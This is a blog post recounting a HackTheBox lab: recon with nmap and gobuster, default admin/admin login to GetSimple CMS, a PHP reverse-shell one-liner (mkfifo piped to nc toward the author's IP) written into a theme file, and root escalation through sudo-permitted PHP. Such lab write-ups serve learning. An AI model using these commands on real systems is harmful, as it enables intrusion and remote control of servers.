Hacking a Server in Three Acts

cyber_zeal

CyberZeal

Posted on May 30, 2024

Hacking a Server in Three Acts

So, I got on this path of Cybersecurity after 10 years of working in industry as a Full Stack Java Developer. How and why that happened will be covered in another blog post. For our story today, only thing that you need to know is that at some point in my journey of learning about Security, I stumbled upon HackTheBox platform.

HTB Platform is about teaching you to hack into servers (boxes). And, man, not just that their content is superb, but the design and UX is so amazing... Long story short, I got hooked up, and started with the first course Cracking Into HTB.

They show you various techniques and stuff, and in the end you get an IP of a box that you need to hack into applying all that you learned. You also get your VM running Linux ParrotSec - a distro preloaded with tools for hacking/pentesting. It was super thrilling, and here is how it went:

Act I: Reconnaissance

First we need to see what's going on with the server, what ports are open and what OS and other software is running there. I wrote down IPs of target and my VM because they will be used often. I ran nmap <TARGET_IP> which performed a quick scan of most common ports. It returned 80 and 443, default ports for http and ssh.

Now I ran full port scan with version scan and scripts which try to obtain more detailed info. You get all this just by running nmap -sV -sC -p- <TARGET_IP>.

While nmap is running (full scan takes some time) I open target IP in browser. I see that Get Simple CMS is running there. Immediately I google GetSimple CMS vulnerabilities. Of course there is one high issue - Remote Code Execution.

I continue with Gobuster which will show me what folders there are on the server: gobuster dir -u <TARGET_IP> -w ./wordlists/common.txt

Well Gobuster showed me that there are some folders, most interesting of them being /admin folder (should have checked this even before I ran gobuster). So, I go to <TARGET_IP>/admin and I get login screen. Now you don't need to be a hacker to enter admin/admin when you see a login screen somewhere.

And interestingly enough, one of the instructors in Cybersecurity training in my company told me that one of the boxes on the (in)famous OSCP certification exam had this vulnerability. So, believe it or not, I got into the admin panel by using admin/admin credentials. Now we still don't have access to the server, but we are awfully close.

Act II: The Walls Have Been Breached

Now, I get back to the vulnerability that I googled. I see it's for version 3.3.16 and I check to see which one we have - it's 3.3.15 so hopefully we are good. I guess I could run the Metasploit here and get into the box using this vulnerability, but that feels like cheating.

At the first look the vulnerability is not straightforward so I get back to see what we have on the admin panel. There is a edit theme page which lets you include PHP files. I check where are those files loaded from. I go through /backup and /data folders that Gobuster found, and see some things that would help me to get the username and pass of admin, which I already guessed. There is an API key which may come in useful. (Later I found out that this would be used for authentication through Metasploit if I didn't get the access to the admin portal).

By this time full nmap scan has finished, I see that server uses OpenSSH 8.2p1 which has some vulnerabilities. But GetSimpleCMS is the elephant in the room here.

I go around the admin panel, there is an upload file button, but it’s not working. I google the issue and it’s not working because flash is not enabled. I get back to the edit theme and start to fiddle with it. I realize immediately that I’m retarded and that I can just write code here directly. Now it’s easy-peasy. At the end of the file, I just write:

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <MY_IP> 9443 >/tmp/f");?>
Enter fullscreen mode Exit fullscreen mode

and, voila, I have a reverse shell. Of course, I need to run netcat to listen to this connection that will be opened: nc -lvnp 9443, and curl or just open the page that has the reverse shell code in it.

We are in! But for our victory to be complete, we need root access. Next step: Privilege escalation.

Act III: All Your Base Are Belong To Us

Let's first upgrade the shell a bit because in current state it doesn't have all the nice features we are used to. There are multiple ways to do this but I did it this way:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Now, I have full blown shell and I'm browsing around the file system to see is there anything interesting that can be used for privilege escalation. I also find the first flag.

I'm thinking of running the LinPEAS, but let's first see what sudo privileges I have - sudo -l -U <username>. Bingo! I see:
(ALL : ALL) NOPASSWD: /usr/bin/php which means I can execute PHP binary as root without password. And you know what that means..

I go and have a quick chat with chatGPT. Essentially you have numerous options here, but I go with interactive shell, because why not take everything life is giving to you.

sudo /usr/bin/php -a

php > chdir('/root');

chdir('/root');

php > print_r(scandir('.'));

print_r(scandir('.'));

Array
(
[0] => .
[1] => ..
[2] => .bash_history
[3] => .bashrc
[4] => .local
[5] => .php_history
[6] => .profile
[7] => .viminfo
[8] => root.txt
[9] => snap
)

php > echo file_get_contents('root.txt');
Enter fullscreen mode Exit fullscreen mode

Essentially, now I have root shell and from here sky is the limit.

Whole process was, as I said, super thrilling. It is a interesting mixture of thrill when you do something bad and of fulfillment when you do something good. But more on that some other time.

💖 💪 🙅 🚩
cyber_zeal
CyberZeal

Posted on May 30, 2024

Join Our Newsletter. No Spam, Only the good stuff.

Sign up to receive the latest update from our blog.

Related